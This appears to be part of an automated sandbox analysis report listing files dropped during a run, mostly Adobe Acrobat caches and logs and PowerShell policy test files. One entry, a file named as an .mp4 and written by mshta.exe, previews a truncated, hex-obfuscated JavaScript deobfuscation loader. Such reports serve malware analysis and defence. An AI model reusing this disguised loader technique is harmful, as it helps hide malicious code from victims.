                                                                        Preview:{"analyticsData":{"responseGUID":"1f485ce8-e251-46da-933b-4a5fd24452e1","sophiaUUID":"0515ACAE-DCC7-4733-8101-9751FF724CB9"},"encodingScheme":true,"expirationDTS":1734594710045,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):4
                                                                        Entropy (8bit):0.8112781244591328
                                                                        Encrypted:false
                                                                        SSDEEP:3:e:e
                                                                        MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                        SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                        SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                        SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                        Malicious:false
                                                                        Preview:....

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):2814
                                                                        Entropy (8bit):5.131115712446971
                                                                        Encrypted:false
                                                                        SSDEEP:24:YwiaGAE3ay4ViRAhijim+CPo7KSajj4j0SyfDq2N632LSsC77gGn7hhc5B9QkFu4:YAEehWLf2UGU63GMgGnM/9bt
                                                                        MD5:03E63C03FF0B0D76DDED4AB1D1EB6C89
                                                                        SHA1:2AB59B7F23355ADB038E729CE3ABB834764D2607
                                                                        SHA-256:CBDC0CECDAC8192AD33B221DEA733DF4FFC574A37CA62732AA3FAE79BF969E06
                                                                        SHA-512:9D9098CE0445DF05F23DB74328F7A3AE2D938350F9E01E33530A99068ED4AB61218011DD2685BC02BC1F325B3BDB050D71F3B218B842E8550D4BE41CB16AD5E2
                                                                        Malicious:false
                                                                        Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"170d249ed7620ea209d1e0a1f6274517","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734421115000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"f38e65cf8926f2bcce0551b5921a30de","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734421115000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"837ad5b364565b3482eebfdbcf446329","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734421115000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"e01b33daa394b0240f89f29c22c35583","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734421115000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"9e6465dccdc1228d732a65b6ed30490d","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734421115000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"b356ccf645c97c0ae9dd6f2f74c23563","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 26, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 26
                                                                        Category:dropped
                                                                        Size (bytes):12288
                                                                        Entropy (8bit):1.3622983538996585
                                                                        Encrypted:false
                                                                        SSDEEP:48:Tll2GL7msMF6gU9rtPth0Ob1lSvp2L6KNrs:fVmsMF6v9rtPth0Ob1l0g36
                                                                        MD5:51939DC8C3E01F6C2AF87570D2C29904
                                                                        SHA1:01264CDD38FCF4753F96560F60B99BCB0EB8C60D
                                                                        SHA-256:1B7C7D0F4F52C18B63E2A49EEAA905836E8B7D0B5BCC886900EC4A6D7F24FE02
                                                                        SHA-512:F476D0EB85541AEEB26788992F07755C7AB02ADC60751E3A574B38534F4C6B099C5B66E3C17B91A9EBE81FBD0366EEF11BD59F6D531068E1546BCFC2B9A7C343
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:SQLite Rollback Journal
                                                                        Category:dropped
                                                                        Size (bytes):8720
                                                                        Entropy (8bit):1.8362451109015776
                                                                        Encrypted:false
                                                                        SSDEEP:48:7MRF6gU9rtPth0Ob1lSvp2LLKNq8nqGufl2GL7msX:70F6v9rtPth0Ob1l0gKE8nKNVmsX
                                                                        MD5:28C9C01D3E340FDD3A987AA16BC34D4E
                                                                        SHA1:AD7F747AA428F5E85E16C5FAFC7247131F89B7F1
                                                                        SHA-256:2EDBBD8D814C32974FA337A11E145E24B30E919406A5AE3AA0E3E0E9CB04932B
                                                                        SHA-512:48F786E8825FAC412BEC77FA1DAF0AC4C23C39807E91674FB3E3E6DDBA6760CD3AEE5F6217F31EA0A9A875F7E64AB836B023C30FED649D226793BD01B33400BB
                                                                        Malicious:false
                                                                        Preview:.... .c......S............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^.-.-.-.-.-.-.-.-.-.-.-........................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):66726
                                                                        Entropy (8bit):5.392739213842091
                                                                        Encrypted:false
                                                                        SSDEEP:768:RNOpblrU6TBH44ADKZEgyxDPsMuVeGWN2hKnmXLn5/xYyu:6a6TZ44ADEyxDkMuVeGWB+K
                                                                        MD5:626A118668DA52646C24ECA17F8FBC29
                                                                        SHA1:553B89766EC86B1527DC924929FCA99D9BF0D8A9
                                                                        SHA-256:CCC9E228E2A092C3FDB4E02D64BB0300280820E6A38343DEF99B455EE570231C
                                                                        SHA-512:D22582D244EAA1533C41D73CA4C5CE1DE314B2C44BEBF083389B6042C2638AC32E094407D3AE2AC2C01BA70568A29A5AA6D3F4AF874498351F1C317E6744B242
                                                                        Malicious:false
                                                                        Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\BUX6P[1].mp4

                                                                        Download File
                                                                        Process:C:\Windows\System32\mshta.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):340566
                                                                        Entropy (8bit):2.46301304463595
                                                                        Encrypted:false
                                                                        SSDEEP:1536:uNu43WE4aoEhcQFQRQFQJQNQFQWQMQRQ5Q7Qu:uNF3WE4aFdaWa+yajNWuEu
                                                                        MD5:0482ADC1DD52998E62BA661EBA48B282
                                                                        SHA1:BCBCE44B94B015EC03A1B6B1FA96070145C08D81
                                                                        SHA-256:40A02D0FEFF6404CE7D5D72CF6B15B84DC326D5169505D366EBBACCFDC5E3458
                                                                        SHA-512:923A68E6E6033A846BF407D1B17FE9BFE50AF6EE3FE0ADC3F22905ABF12CD36537F96C5BA84541299CD3ABE927255E8DB973D4D038159B2DDA08084D574D6F94
                                                                        Malicious:false
                                                                        Preview:66N75T6ev63j74A69V6fz6eV20w67M61t6fo59U63p28t66w6eu44w77p45K50f29p7bK76f61S72D20W49W67B63P4dR49S3dx20y27L27J3bM66x6fc72q20J28o76D61s72h20r4bT41O46D61I20U3dP20Y30T3bK4bY41I46Q61Q20x3cz20d66T6eh44u77b45q50W2ee6ck65k6ex67U74z68A3br20l4bS41x46b61k2bH2bT29t7bv76C61t72e20n4dn4fA64v71g20f3dq20g53V74V72x69F6eA67w2ek66T72Y6fW6dv43Z68S61T72m43q6fS64p65M28r66K6ea44m77s45h50M5bj4bq41j46o61R5do20I2dU20V31Q38U35s29b3bn49X67A63V4dY49G20U3dL20T49A67J63d4dq49S20z2bW20u4di4fF64Y71n7dM72t65j74k75E72G6eR20x49x67V63W4da49O7dZ3bU76K61F72N20m49N67A63P4dp49a20K3da20W67I61y6fb59h63O28T5bn32a39e37Q2cl32U39z36D2cO33W30f34n2cC32c38t36f2cL32p39U39T2cK33m30x30D2cJ32Z38d39k2cI32y38W36n2cH32G39a33y2cp32t39U33t2cm32K33m31t2cK32m38I36x2cc33d30m35m2cN32v38J36A2cd32a31H37L2cq32O33u30P2cz33r30g34w2cC32v31p37S2cU32b33g34A2cA32D31t37W2cR32f33H30e2cL32k38a36M2cx32Z39U37P2cl32I31C37X2cP32X37u30T2cG32L39v35h2co32U39R39l2cO32J38A36Z2ch33k30u30K2cH33Q30D31P2cQ32T39y39c2ca32a39g30M2cY32J38k34d2cJ33Z30Q31F2ck32Z38q36r2cT32p38x35o2

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):11608
                                                                        Entropy (8bit):4.890472898059848
                                                                        Encrypted:false
                                                                        SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                        MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                        SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                        SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                        SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                        Malicious:false
                                                                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):64
                                                                        Entropy (8bit):0.34726597513537405
                                                                        Encrypted:false
                                                                        SSDEEP:3:Nlll:Nll
                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                        Malicious:false
                                                                        Preview:@...e...........................................................

                                                                        C:\Users\user\AppData\Local\Temp\MSI4231f.LOG

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):246
                                                                        Entropy (8bit):3.5274671434738973
                                                                        Encrypted:false
                                                                        SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8AYlnNWlu:Qw946cPbiOxDlbYnuRKO/iu
                                                                        MD5:7C9BBC1249E07C29E0314AB9FCCC5FD9
                                                                        SHA1:B280789D2E9635D2ADE03B905163A813A4D1614E
                                                                        SHA-256:08307A3D44B765BA5383019F19D3B23F54559822636203FF0933E29BED79EBC6
                                                                        SHA-512:B65A208A5F5663F999590738301FFA501144E669F77B4B7AAABB3C52DE5B1CD290238C0CB8AB3B2B1754D5B27B77DC62E749C614AE8CF6239336381DD8BF0C2C
                                                                        Malicious:false
                                                                        Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.7./.1.2./.2.0.2.4. . .0.2.:.3.8.:.3.5. .=.=.=.....

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4zs4ovgr.iko.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bd1ugvji.dr0.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dhxndoap.meb.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qeq4p5zl.k05.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rupt2tv4.wou.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uobnwi12.npg.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-17 02-38-28-826.log

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:ASCII text, with very long lines (393)
                                                                        Category:dropped
                                                                        Size (bytes):16525
                                                                        Entropy (8bit):5.325555449275219
                                                                        Encrypted:false
                                                                        SSDEEP:384:JekpMW7ujsO+Z3k/V1WPGHEQRmpvtV7C36g2OwfBhBUtBX66p0o6V6xG4W7wtNF2:nO2
                                                                        MD5:39628FA3AE1A78F558A4947A4847C830
                                                                        SHA1:083A80F18FBEA378E9944FF9B6B74FE68CD56D92
                                                                        SHA-256:E634D52BBCA86894E6CF9CA673A8FA4035AD705990F27198651E88F969FE73AC
                                                                        SHA-512:F488D486C5DA8E071B212070005D5F91E4D06CD8D6E65BBBA1D8D5CE9FE929C8935841A93180297EE8B4F50069F06455850DAFAB1525B2F33797248BEDBF0A69
                                                                        Malicious:false
                                                                        Preview:SessionID=ee10203f-55ea-443a-a3fb-eaf6336a26b5.1696508793278 Timestamp=2023-10-05T14:26:33:278+0200 ThreadID=5108 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=ee10203f-55ea-443a-a3fb-eaf6336a26b5.1696508793278 Timestamp=2023-10-05T14:26:33:279+0200 ThreadID=5108 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=ee10203f-55ea-443a-a3fb-eaf6336a26b5.1696508793278 Timestamp=2023-10-05T14:26:33:279+0200 ThreadID=5108 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=ee10203f-55ea-443a-a3fb-eaf6336a26b5.1696508793278 Timestamp=2023-10-05T14:26:33:279+0200 ThreadID=5108 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=ee10203f-55ea-443a-a3fb-eaf6336a26b5.1696508793278 Timestamp=2023-10-05T14:26:33:279+0200 ThreadID=5108 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                                        C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):15114
                                                                        Entropy (8bit):5.3598930507235805
                                                                        Encrypted:false
                                                                        SSDEEP:384:mTbylyOdNdXdUd/Tdsdld7dUs6s6QsvsvGEamaK+E+4PVPhP6PvPrxIKI6IkImJz:Kx9
                                                                        MD5:ACD4CD727D288D853A77A7B222271E35
                                                                        SHA1:80E1B0AD3533FF16BCFF4F984F46908CC17A8194
                                                                        SHA-256:B402CE58B3F3059C3597813DF3F22FC7FB159380F2E3C5D52860004E8F826D6E
                                                                        SHA-512:E03FEC99216BCE5B1BDA53039D9365CF0BBC045FBB95D32896161FECEB5980CB908CEB039F6EDECB8BD155DE1104274CA808E1A7A8AD5EA4AD6497FD60AF729D
                                                                        Malicious:false
                                                                        Preview:SessionID=bb88690c-537c-4c4b-b57a-3a75dcfb121b.1734421108850 Timestamp=2024-12-17T02:38:28:850-0500 ThreadID=7984 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=bb88690c-537c-4c4b-b57a-3a75dcfb121b.1734421108850 Timestamp=2024-12-17T02:38:28:851-0500 ThreadID=7984 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=bb88690c-537c-4c4b-b57a-3a75dcfb121b.1734421108850 Timestamp=2024-12-17T02:38:28:851-0500 ThreadID=7984 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=bb88690c-537c-4c4b-b57a-3a75dcfb121b.1734421108850 Timestamp=2024-12-17T02:38:28:852-0500 ThreadID=7984 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=bb88690c-537c-4c4b-b57a-3a75dcfb121b.1734421108850 Timestamp=2024-12-17T02:38:28:852-0500 ThreadID=7984 Component=ngl-lib_NglAppLib Description="SetConf

                                                                        C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):29752
                                                                        Entropy (8bit):5.403427620896042
                                                                        Encrypted:false
                                                                        SSDEEP:768:SllhexEhcIWcsRoUh39w7P/t8k+yyUXhS8K:SllhexEhcIWcsRoUh39w7P/t8k+yyUXY
                                                                        MD5:7F0FBBA64241E481F2B061A27B8107BC
                                                                        SHA1:09EC536B7E692D2BF97D7C236053819DF757E76F
                                                                        SHA-256:ECFE5BD536673D0BA48CFB971A03BFCB15B9627235D66B1392C534481D14841F
                                                                        SHA-512:D00C8C4F696097846526B0759A32199399870B68B2A948CC3670CD0377B7BC2BB70849A0FD37D300E0EFCF15A3EBCD37A76F47F891004F12F76461EFDE717F7D
                                                                        Malicious:false
                                                                        Preview:05-10-2023 02:07:19:.---2---..05-10-2023 02:07:19:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 02:07:19:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 02:07:19:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 02:07:19:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 02:07:19:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 02:07:19:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 02:07:19:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 02:07:19:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 02:07:19:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 02:07:19:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 02:07:19:.Closing File..05-10-

                                                                        C:\Users\user\AppData\Local\Temp\acrocef_low\0e4abb60-5e71-462d-bfa8-1523a8d447ea.tmp

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                        Category:dropped
                                                                        Size (bytes):758601
                                                                        Entropy (8bit):7.98639316555857
                                                                        Encrypted:false
                                                                        SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                        MD5:3A49135134665364308390AC398006F1
                                                                        SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                        SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                        SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                        Malicious:false
                                                                        Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                                        C:\Users\user\AppData\Local\Temp\acrocef_low\57d67212-b5e5-4fec-b9d8-94ee69f1d017.tmp

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                        Category:dropped
                                                                        Size (bytes):1407294
